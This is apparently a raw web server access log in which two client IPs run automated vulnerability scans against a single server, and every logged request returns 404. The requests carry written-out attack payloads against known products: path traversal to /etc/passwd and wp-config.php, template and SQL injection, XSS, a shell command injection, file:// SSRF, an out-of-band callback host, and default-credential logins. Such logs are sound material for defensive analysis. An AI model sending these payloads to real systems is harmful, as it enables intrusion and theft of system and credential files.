outputSyntax=plain&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22Hello%20from%22%20%2B%20%22%20search%20text%3A%22%20%2B%20%2823%20%2B%2019%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/100.0.4896.127+Safari/537.36 - 404 7 0 60 2024-12-12 22:18:01 103.153.214.94 GET /bin/get/Main/DatabaseSearch outputSyntax=plain&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22Hello%20from%22%20%2B%20%22%20search%20text%3A%22%20%2B%20%2823%20%2B%2019%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2+Safari/605.7.20 - 404 7 0 43 2024-12-12 22:19:49 103.153.214.94 GET /wp-content/plugins/admin-word-count-column/download-csv.php path=../../../../../../../../../../../../etc/passwd\0 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+12_1_4;+en-US)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.1.15 - 404 7 0 39 2024-12-12 22:20:54 103.153.214.94 GET /admin/install/server - 8172 - 206.238.196.225 Mozilla/5.0+(Fedora;+Linux+x86_64;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 39 2024-12-12 22:21:18 103.153.214.94 GET / patron_only_image=../../../../../../../../../../etc/passwd&patreon_action=serve_patron_only_image 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.6.25 - 404 7 0 38 2024-12-12 22:22:05 103.153.214.94 GET /index.php option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/121.0.0.0+Safari/537.36 - 404 7 0 58 2024-12-12 22:22:07 103.153.214.94 GET /searchreplacedb2.php - 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+x86_64;+rv:120.0)+Gecko/20100101+Firefox/120.0 - 404 7 0 38 2024-12-12 22:22:38 103.153.214.94 GET /ajax-api/2.0/preview/mlflow/experiments/get experiment_id=0 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.2.23 - 404 7 0 65 2024-12-12 22:22:40 103.153.214.94 GET /ecrire/ exec=install 8172 - 206.238.196.225 Mozilla/5.0+(Fedora;+Linux+x86_64;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 7 0 32 2024-12-12 22:23:16 103.153.214.94 POST /Users/authenticatebyname - 8172 - 156.251.25.152 Mozilla/5.0+(Knoppix;+Linux+x86_64;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 195 2024-12-12 22:23:16 103.153.214.94 POST /Users/authenticatebyname - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4+Safari/605.2.27 - 404 7 0 199 2024-12-12 22:23:16 103.153.214.94 POST /Users/authenticatebyname - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh,+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 234 2024-12-12 22:23:17 103.153.214.94 POST /Users/authenticatebyname - 8172 - 156.251.25.152 Mozilla/5.0+(Knoppix;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/119.0.0.0+Safari/537.36 - 404 7 0 200 2024-12-12 22:23:17 103.153.214.94 POST /Users/authenticatebyname - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/64.0.3282.140+Safari/537.36+Edge/18.17763 - 404 7 0 200 2024-12-12 22:23:17 103.153.214.94 POST /Users/authenticatebyname - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+x86_64;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 201 2024-12-12 22:23:17 103.153.214.94 POST /Users/authenticatebyname - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/16.3+Safari/605.1.15 - 404 7 0 199 2024-12-12 22:23:17 103.153.214.94 POST /Users/authenticatebyname - 8172 - 156.251.25.152 Mozilla/5.0+(Knoppix;+Linux+i686;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 198 2024-12-12 22:23:17 103.153.214.94 POST /Users/authenticatebyname - 8172 - 156.251.25.152 Mozilla/5.0+(Kubuntu;+Linux+i686;+rv:122.0)+Gecko/20100101+Firefox/122.0 - 404 7 0 201 2024-12-12 22:23:17 103.153.214.94 POST /Users/authenticatebyname - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/127.0.0.0+Safari/537.36 - 404 7 0 204 2024-12-12 22:23:17 103.153.214.94 POST /Users/authenticatebyname - 8172 - 156.251.25.152 Mozilla/5.0+(Fedora;+Linux+x86_64;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 200 2024-12-12 22:23:17 103.153.214.94 POST /Users/authenticatebyname - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.2.22 - 404 7 0 205 2024-12-12 22:23:41 103.153.214.94 GET /index.php/Home/uploadify/fileList type=.+&path=../../../ 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/104.0.0.0+Safari/537.36 - 404 7 0 40 2024-12-12 22:24:11 103.153.214.94 GET /index.php option=com_jstore&controller=./../../../../../../../../etc/passwd%00 8172 - 206.238.196.225 Mozilla/5.0+(Kubuntu;+Linux+i686;+rv:122.0)+Gecko/20100101+Firefox/122.0 - 404 7 0 58 2024-12-12 22:25:40 103.153.214.94 GET / q=%27%3E%22%3Csvg%2Fonload=confirm%28%27q%27%29%3E&s=%27%3E%22%3Csvg%2Fonload=confirm%28%27s%27%29%3E&search=%27%3E%22%3Csvg%2Fonload=confirm%28%27search%27%29%3E&id=%27%3E%22%3Csvg%2Fonload=confirm%28%27id%27%29%3E&action=%27%3E%22%3Csvg%2Fonload=confirm%28%27action%27%29%3E&keyword=%27%3E%22%3Csvg%2Fonload=confirm%28%27keyword%27%29%3E&query=%27%3E%22%3Csvg%2Fonload=confirm%28%27query%27%29%3E&page=%27%3E%22%3Csvg%2Fonload=confirm%28%27page%27%29%3E&keywords=%27%3E%22%3Csvg%2Fonload=confirm%28%27keywords%27%29%3E&url=%27%3E%22%3Csvg%2Fonload=confirm%28%27url%27%29%3E&view=%27%3E%22%3Csvg%2Fonload=confirm%28%27view%27%29%3E&cat=%27%3E%22%3Csvg%2Fonload=confirm%28%27cat%27%29%3E&name=%27%3E%22%3Csvg%2Fonload=confirm%28%27name%27%29%3E&key=%27%3E%22%3Csvg%2Fonload=confirm%28%27key%27%29%3E&p=%27%3E%22%3Csvg%2Fonload=confirm%28%27p%27%29%3E 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 72 2024-12-12 22:25:43 103.153.214.94 GET / api=%27%3E%22%3Csvg%2Fonload=confirm%28%27api%27%29%3E&api_key=%27%3E%22%3Csvg%2Fonload=confirm%28%27api_key%27%29%3E&begindate=%27%3E%22%3Csvg%2Fonload=confirm%28%27begindate%27%29%3E&callback=%27%3E%22%3Csvg%2Fonload=confirm%28%27callback%27%29%3E&categoryid=%27%3E%22%3Csvg%2Fonload=confirm%28%27categoryid%27%29%3E&csrf_token=%27%3E%22%3Csvg%2Fonload=confirm%28%27csrf_token%27%29%3E&email=%27%3E%22%3Csvg%2Fonload=confirm%28%27email%27%29%3E&emailto=%27%3E%22%3Csvg%2Fonload=confirm%28%27emailto%27%29%3E&enddate=%27%3E%22%3Csvg%2Fonload=confirm%28%27enddate%27%29%3E&immagine=%27%3E%22%3Csvg%2Fonload=confirm%28%27immagine%27%29%3E&item=%27%3E%22%3Csvg%2Fonload=confirm%28%27item%27%29%3E&jsonp=%27%3E%22%3Csvg%2Fonload=confirm%28%27jsonp%27%29%3E&l=%27%3E%22%3Csvg%2Fonload=confirm%28%27l%27%29%3E&lang=%27%3E%22%3Csvg%2Fonload=confirm%28%27lang%27%29%3E&list_type=%27%3E%22%3Csvg%2Fonload=confirm%28%27list_type%27%29%3E 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.6.24 - 404 7 0 30 2024-12-12 22:25:48 103.153.214.94 GET / month=%27%3E%22%3Csvg%2Fonload=confirm%28%27month%27%29%3E&page_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27page_id%27%29%3E&password=%27%3E%22%3Csvg%2Fonload=confirm%28%27password%27%29%3E&terms=%27%3E%22%3Csvg%2Fonload=confirm%28%27terms%27%29%3E&token=%27%3E%22%3Csvg%2Fonload=confirm%28%27token%27%29%3E&type=%27%3E%22%3Csvg%2Fonload=confirm%28%27type%27%29%3E&unsubscribe_token=%27%3E%22%3Csvg%2Fonload=confirm%28%27unsubscribe_token%27%29%3E&year=%27%3E%22%3Csvg%2Fonload=confirm%28%27year%27%29%3E 8172 - 206.238.196.225 Mozilla/5.0+(Kubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/124.0.0.0+Safari/537.36 - 404 7 0 46 2024-12-12 22:26:04 103.153.214.94 GET /.../.../.../.../.../.../.../.../.../windows/win.ini - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/103.0.0.0+Safari/537.36 - 404 0 0 60 2024-12-12 22:26:10 103.153.214.94 GET /.../.../.../.../.../.../.../.../.../etc/passwd - 8172 - 206.238.196.225 Mozilla/5.0+(Kubuntu;+Linux+x86_64;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 0 0 71 2024-12-12 22:27:00 103.153.214.94 GET / - 8172 - 206.238.196.225 Mozilla/5.0+(Ubuntu;+Linux+i686;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 34 2024-12-12 22:27:53 103.153.214.94 GET /zabbix/index_sso.php - 8172 - 206.238.196.225 Mozilla/5.0+(Kubuntu;+Linux+x86_64;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 41 2024-12-12 22:27:59 103.153.214.94 GET /index_sso.php - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.1.35 - 404 7 0 36 2024-12-12 22:28:10 103.153.214.94 POST /hub/login next 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/60.0.3112.32+Safari/537.36 - 404 7 0 207 2024-12-12 22:28:10 103.153.214.94 POST /hub/login next 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 218 2024-12-12 22:28:12 103.153.214.94 POST /c6/Jhsoft.Web.login/AjaxForLogin.aspx - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_16)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.1.15 - 404 7 0 200 2024-12-12 22:28:17 103.153.214.94 GET /server/node_upgrade_srv.js action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+x86_64;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 56 2024-12-12 22:28:17 103.153.214.94 GET /Ajax/AjaxMethod.ashx action=getEmpByname&Name=Y'+union+select+substring(sys.fn_sqlvarbasetostr(HASHBYTES('MD5','999999999')),3,32)-- 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 38 2024-12-12 22:28:21 103.153.214.94 GET /cgi-bin-hax/ExportSettings.sh - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+CrOS+x86_64+14541.0.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 41 2024-12-12 22:28:21 103.153.214.94 GET /server/node_upgrade_srv.js action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini 8172 - 206.238.196.225 Mozilla/5.0+(CentOS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/120.0.0.0+Safari/537.36 - 404 7 0 37 2024-12-12 22:28:48 103.153.214.94 POST /PDC/ajaxreq.php PARAM=127.0.0.1+-c+0%3B+cat+%2Fetc%2Fpasswd&DIAGNOSIS=PING 8172 - 206.238.196.225 Mozilla/5.0+(Fedora;+Linux+i686;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 37 2024-12-12 22:28:48 103.153.214.94 GET /api/filemanager path=%2F..%2f..%2fContent 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:109.0)+Gecko/20100101+Firefox/118.0 - 404 7 0 32 2024-12-12 22:30:47 103.153.214.94 GET /api/geojson url=file:///etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 103 2024-12-12 22:30:51 103.153.214.94 GET /api/geojson url=file:///c://windows/win.ini 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/112.0.0.0+Safari/537.36 - 404 7 0 30 2024-12-12 22:30:51 103.153.214.94 GET /application/install/index.php - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.1+Safari/605.4.21 - 404 7 0 33 2024-12-12 22:30:51 103.153.214.94 GET /api/v1/ndconfig mode&uid=1'%20UNION%20select%201,2,3,sqlite_version();-- 8172 - 206.238.196.225 Mozilla/5.0+(Fedora;+Linux+x86_64;+rv:120.0)+Gecko/20100101+Firefox/120.0 - 404 7 0 53 2024-12-12 22:31:56 103.153.214.94 POST /lucee/admin/web.cfm - 8172 - 156.251.25.152 Mozilla/5.0+(Kubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/127.0.0.0+Safari/537.36 - 404 7 0 228 2024-12-12 22:32:05 103.153.214.94 GET /ueditor/net/controller.ashx action=catchimage&encode=utf-8 8172 - 206.238.196.225 Mozilla/5.0+(Fedora;+Linux+i686;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 31 2024-12-12 22:32:07 103.153.214.94 POST / - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.1.63 - 404 7 0 202 2024-12-12 22:32:27 103.153.214.94 GET /command/prima-factory.cgi - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/18.0+Safari/605.1.26 - 404 7 0 55 2024-12-12 22:32:34 103.153.214.94 GET /remote/fgt_lang lang=/../../../..//////////dev/cmdb/sslvpn_websession 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 62 2024-12-12 22:32:50 103.153.214.94 GET /pods - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.1.18 - 404 7 0 30 2024-12-12 22:32:53 103.153.214.94 GET /api/v1/pods - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17+Safari/605.1.15 - 404 7 0 41 2024-12-12 22:33:03 103.153.214.94 GET /cgi-bin/nas_sharing.cgi user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= 8172 - 206.238.196.225 Mozilla/5.0+(CentOS;+Linux+x86_64;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 33 2024-12-12 22:33:03 103.153.214.94 GET /ui/vropspluginui/rest/services/getstatus - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64;+rv:76.0)+Gecko/20100101+Firefox/76.0 - 404 7 0 38 2024-12-12 22:33:21 103.153.214.94 GET /forumrunner/request.php d=1&cmd=get_spam_data&postids=-1%27 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+i686;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 40 2024-12-12 22:33:21 103.153.214.94 GET /cb_install/ - 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+i686;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 30 2024-12-12 22:33:25 103.153.214.94 GET /boards/forumrunner/request.php d=1&cmd=get_spam_data&postids=-1%27 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17+Safari/605.1.15 - 404 7 0 38 2024-12-12 22:33:29 103.153.214.94 GET /board/forumrunner/request.php d=1&cmd=get_spam_data&postids=-1%27 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64;+rv:84.0)+Gecko/20100101+Firefox/84.0 - 404 7 0 58 2024-12-12 22:33:32 103.153.214.94 GET /forum/forumrunner/request.php d=1&cmd=get_spam_data&postids=-1%27 8172 - 206.238.196.225 Mozilla/5.0+(CentOS;+Linux+i686;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 7 0 37 2024-12-12 22:33:32 103.153.214.94 GET /audit/gui_detail_view.php token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin 8172 - 206.238.196.225 Mozilla/5.0+(CentOS;+Linux+i686;+rv:122.0)+Gecko/20100101+Firefox/122.0 - 404 7 0 45 2024-12-12 22:33:34 103.153.214.94 GET /wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php file=../../../wp-config.php 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64;+rv:88.0)+Gecko/20100101+Firefox/88.0 - 404 7 0 34 2024-12-12 22:33:37 103.153.214.94 GET /forums/forumrunner/request.php d=1&cmd=get_spam_data&postids=-1%27 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+13_5_3;+en-US)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.1.4+Safari/605.1.15 - 404 7 0 55 2024-12-12 22:33:39 103.153.214.94 GET /login login=lutron&password=lutron 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.13;+rv:88.0)+Gecko/20100101+Firefox/88.0 - 404 7 0 224 2024-12-12 22:33:41 103.153.214.94 GET /vb/forumrunner/request.php d=1&cmd=get_spam_data&postids=-1%27 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+x86_64;+rv:122.0)+Gecko/20100101+Firefox/122.0 - 404 7 0 33 2024-12-12 22:34:48 103.153.214.94 GET /NCFindWeb service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.16;+rv:85.0)+Gecko/20100101+Firefox/85.0 - 404 7 0 38 2024-12-12 22:39:09 103.153.214.94 GET /install.php - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3+Safari/605.1.15 - 404 7 0 62 2024-12-12 22:39:09 103.153.214.94 GET /.s3cfg - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+12.5)+AppleWebKit/617.19+(KHTML,+like+Gecko)+Version/17.6.47+Safari/617.19 - 404 7 0 37 2024-12-12 22:39:10 103.153.214.94 GET /api/change_setting second_value=no_reload&disable_sequence=true&value=../../../../../../../etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/95.0.4638.69+Safari/537.36 - 404 7 0 32 2024-12-12 22:39:10 103.153.214.94 GET /api/v1/confup mode&uid=1'%20UNION%20select%201,2,3,4,sqlite_version();-- 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 32 2024-12-12 22:40:07 103.153.214.94 POST /minio/webrpc - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.102+Safari/537.36+Edge/18.19041 - 404 7 0 204 2024-12-12 22:40:08 103.153.214.94 POST /minio/webrpc - 8172 - 156.251.25.152 Mozilla/5.0+(Fedora;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 - 404 7 0 216 2024-12-12 22:40:12 103.153.214.94 GET / id=dqZxaR%25{128*128} 8172 - 206.238.196.225 Mozilla/5.0+(Fedora;+Linux+i686;+rv:122.0)+Gecko/20100101+Firefox/122.0 - 404 7 0 63 2024-12-12 22:41:44 103.153.214.94 GET /wp-content/plugins/wp-advanced-search/class.inc/autocompletion/autocompletion-PHP5.5.php q=admin&t=wp_users%20--&f=user_login&type&e 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.7.25 - 404 7 0 46 2024-12-12 22:41:46 103.153.214.94 GET /plus/ajax_officebuilding.php act=key&key=%e9%8c%a6%27%20a<>nd%201=2%20un<>ion%20sel<>ect%201,2,3,md5(999999999),5,6,7,8,9%23 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Safari/537.36+HeyTapBrowser/45.11.0.1.1+Chrome/91.0.4472.88 - 404 7 0 38 2024-12-12 22:41:47 103.153.214.94 GET /ctcj3jjbclslbev4n7q0sbkwchxjmyrz6.oast.live/apachehttpd - 8172 - 206.238.196.225 Mozilla/5.0+(Ubuntu;+Linux+i686;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 41 2024-12-12 22:42:41 103.153.214.94 GET /jmx-console/ - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/16.0+Safari/605.1.15 - 404 7 0 196 2024-12-12 22:42:41 103.153.214.94 GET /jmx-console/ - 8172 - 156.251.25.152 Mozilla/5.0+(Kubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/119.0.0.0+Safari/537.36 - 404 7 0 202 2024-12-12 22:42:41 103.153.214.94 GET /jmx-console/ - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.0+Safari/605.5.20 - 404 7 0 198 2024-12-12 22:42:41 103.153.214.94 GET /jmx-console/ - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3+Safari/617.2.4.11.12 - 404 7 0 207 2024-12-12 22:42:41 103.153.214.94 GET /jmx-console/ - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Safari/537.36+HeyTapBrowser/45.11.0.1.1+Chrome/91.0.4472.88 - 404 7 0 196 2024-12-12 22:42:41 103.153.214.94 GET /jmx-console/ - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64;+rv:88.0)+Gecko/20100101+Firefox/88.0 - 404 7 0 206 2024-12-12 22:42:41 103.153.214.94 GET /jmx-console/ - 8172 - 156.251.25.152 Mozilla/5.0+(SS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 - 404 7 0 203 2024-12-12 22:42:41 103.153.214.94 GET /jmx-console/ - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 202 2024-12-12 22:42:41 103.153.214.94 GET /jmx-console/ - 8172 - 156.251.25.152 Mozilla/5.0+(Fedora;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/124.0.0.0+Safari/537.36 - 404 7 0 201 2024-12-12 22:42:41 103.153.214.94 GET /jmx-console/ - 8172 - 156.251.25.152 Mozilla/5.0+(SS;+Linux+i686;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 205 2024-12-12 22:42:41 103.153.214.94 GET /jmx-console/ - 8172 - 156.251.25.152 Mozilla/5.0+(Ubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 207 2024-12-12 22:42:41 103.153.214.94 GET /jmx-console/ - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+CrOS+x86_64+14541.0.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/116.0.0.0+Safari/537.36 - 404 7 0 199 2024-12-12 22:42:41 103.153.214.94 GET /jmx-console/ - 8172 - 156.251.25.152 Mozilla/5.0+(SS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 204 2024-12-12 22:42:41 103.153.214.94 GET /jmx-console/ - 8172 - 156.251.25.152 Mozilla/5.0+(ZZ;+Linux+i686;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 7 0 202 2024-12-12 22:42:41 103.153.214.94 GET /jmx-console/ - 8172 - 156.251.25.152 Mozilla/5.0+(Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/128.0.0.0+Safari/537.36 - 404 7 0 204 2024-12-12 22:42:41 103.153.214.94 GET /jmx-console/ - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/106.0.0.0+Safari/537.36 - 404 7 0 201 2024-12-12 22:42:41 103.153.214.94 GET /jmx-console/ - 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 216 2024-12-12 22:42:41 103.153.214.94 GET /jmx-console/ - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14_3_1)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3.1+Safari/605.1.15 - 404 7 0 218 2024-12-12 22:42:41 103.153.214.94 GET /jmx-console/ - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 222 2024-12-12 22:42:41 103.153.214.94 GET /jmx-console/ - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+x86_64;+rv:109.0)+Gecko/20100101+Firefox/118.0 - 404 7 0 251 2024-12-12 22:42:41 103.153.214.94 GET /jmx-console/ - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/117.0.0.0+Safari/537.36 - 404 7 0 234 